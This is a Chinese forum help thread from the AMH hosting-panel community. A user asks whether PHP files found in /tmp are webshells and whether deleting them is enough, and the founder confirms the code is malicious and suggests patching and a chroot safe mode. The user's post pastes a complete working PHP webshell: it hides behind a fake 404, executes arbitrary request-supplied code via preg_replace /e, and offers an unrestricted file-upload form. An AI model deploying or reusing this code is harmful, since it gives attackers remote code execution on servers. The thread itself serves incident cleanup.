产品服务AMH 免费服务器主机面板SSL证书 免费SSL证书申请编程助手免费智能写代码、翻译NewAMYSQL 免费MySQL管理工具AMFTP 免费FTP管理客户端

AMH 社区首页

 AMH社区 - 开放自由有价值的社区

[求助帖] tmp下有很多php开头的,被认为是webshell木马

anxiaoqu
铁牌会员
4.76 价值分

anxiaoqu 发表于 2018-02-10 09:39:12
tmp下有很多php开头的,被认为是webshell木马,怎么删除?


if (!isset($_REQUEST['iuwhans1'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['iuwhans1'], '');
$var= $_SERVER['PHP_SELF'];
$form =<<<HTML
<form enctype="multipart/form-data" action="$var" method="POST">
<input name="uploadFile" type="file"/><br/>
<input type="submit" value="Upload" />
</form>
HTML;

if (!empty($_FILES['uploadFile'])) {
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], dirname(__FILE__).DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
print "OK";
} else print $form;
?>


里面的内容是这个


是木马吗?
直接删除就可以了吗
评价: 这个问题有价值吗?  没有 (0分)   有, 感谢 (0分)
2018-02-10 09:39:12 1

amysql
创始人
99530.04 价值分

这脚本看是有问题,要注意网站程序的安全,漏洞更新等,
是可以直接删除。

建议用amchroot的安全模式防跨站。
评价: 这个答复有价值吗?  没有 (0分)   有, 感谢 (0分)
回复  2018-02-10 17:56:27 2

AMH面板 - 好用高效低占用、安全可靠极稳定

 1  (总1页)
AMH社区列表
用户服务中心